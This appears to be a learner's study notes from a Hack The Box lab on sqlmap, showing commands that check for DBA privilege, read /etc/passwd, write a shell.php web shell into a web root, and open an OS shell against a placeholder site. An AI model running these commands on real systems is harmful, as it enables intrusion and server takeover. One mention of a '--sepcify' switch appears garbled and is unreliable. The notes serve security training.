File Read
To read files, DB user must have the privilege to LOAD DATA and INSERT.
Most likely, we will need DBA to read data.
To check for DBA privilege, we use --is-dba switch:
jadu101@htb[/htb]$ sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba
...SNIP...
current user is DBA: True
[*] ending @ 17:31:56 /2020-11-19We can read files using --file-read option:
jadu101@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"File Write
Most of the time, we won’t be able to write a file.
We need DBA’s to be able to write files.
We can write files as such:
jadu101@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"OS Command Execution
jadu101@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1" --os-shellIf we know the type of SQL injection we can specify using --sepcify switch:
jadu101@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1" --os-shell --technique=E